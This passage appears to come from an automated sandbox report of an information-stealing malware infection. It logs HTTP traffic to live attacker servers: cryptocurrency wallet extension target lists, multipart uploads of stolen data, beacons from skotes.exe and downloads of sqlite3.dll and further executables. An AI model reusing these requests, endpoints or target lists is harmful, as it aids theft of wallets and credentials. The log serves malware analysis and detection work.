                                                                                                                                                                                                                                              Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235177040 CET1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                                                                                                              Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235188961 CET224INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                                                                                                              Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxw
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235268116 CET1236INData Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d
                                                                                                                                                                                                                                              Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235280991 CET1236INData Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32
                                                                                                                                                                                                                                              Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235292912 CET424INData Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32
                                                                                                                                                                                                                                              Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235507011 CET1236INData Raw: 5a 32 70 76 5a 33 42 76 61 57 52 6c 61 6d 52 6c 62 57 64 76 62 32 4e 6f 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33
                                                                                                                                                                                                                                              Data Ascii: Z2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.235524893 CET516INData Raw: 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44
                                                                                                                                                                                                                                              Data Ascii: b2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFd
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.250269890 CET470OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 268
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32 32 37 36 62 63 32 31 39 31 61 66 65 34 66 36 62 64 65 39 32 36 36 66 31 61 64 63 31 32 34 39 34 66 37 37 66 35 34 62 37 61 37 62 30 39 63 36 38 66 61 65 35 34 36 39 63 65 38 65 65 64 38 32 66 38 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a
                                                                                                                                                                                                                                              Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="message"fplugins------HDGIJJDGCBKFIDHIEBKE--
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.537338972 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:30 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Content-Length: 108
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=96
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38
                                                                                                                                                                                                                                              Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.624567986 CET203OUTPOST /6c4adf523b719729.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----JEGHJDGIJECGDHJJECGH
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Content-Length: 6631
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:30.624568939 CET6631OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 4a 44 47 49 4a 45 43 47 44 48 4a 4a 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 30 35 38 36 32
                                                                                                                                                                                                                                              Data Ascii: ------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="token"305862276bc2191afe4f6bde9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89------JEGHJDGIJECGDHJJECGHContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:31.434533119 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:30 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Keep-Alive: timeout=5, max=95
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:31.750555992 CET94OUTGET /746f34465cf17784/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.206
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:32.035691023 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:31 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                              ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Content-Length: 1106998
                                                                                                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:32.035731077 CET112INData Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii: #N@B/81s:<R@B/92P @


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              11192.168.2.463931185.215.113.43805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:32.133558035 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 30 33 33 34 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                              Data Ascii: d1=1003345001&unit=246122658369
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:33.062417984 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:32 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              12192.168.2.463937185.215.113.16805844C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:33.086041927 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038794994 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:33 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 2866688
                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Nov 2024 05:02:08 GMT
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              ETag: "6725b250-2bbe00"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 45 06 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ , `@ `,E,`Ui` @ @.rsrc`2@.idata 8@krwtsfss`+^+:@qssevqjd ,+@.taggant@ ,"+@
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038806915 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038836002 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038846970 CET12INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038889885 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038899899 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038949966 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038960934 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038973093 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.038995981 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:34.043761015 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              13192.168.2.463979185.215.113.16801236C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:39.235203028 CET200OUTGET /off/def.exe HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Host: 185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185719013 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:40 GMT
                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                              Content-Length: 2866688
                                                                                                                                                                                                                                              Last-Modified: Sat, 02 Nov 2024 05:02:10 GMT
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              ETag: "6725b252-2bbe00"
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2c 00 00 04 00 00 45 06 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ , `@ `,E,`Ui` @ @.rsrc`2@.idata 8@krwtsfss`+^+:@qssevqjd ,+@.taggant@ ,"+@
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185808897 CET212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:40.185820103 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                              Data Ascii:
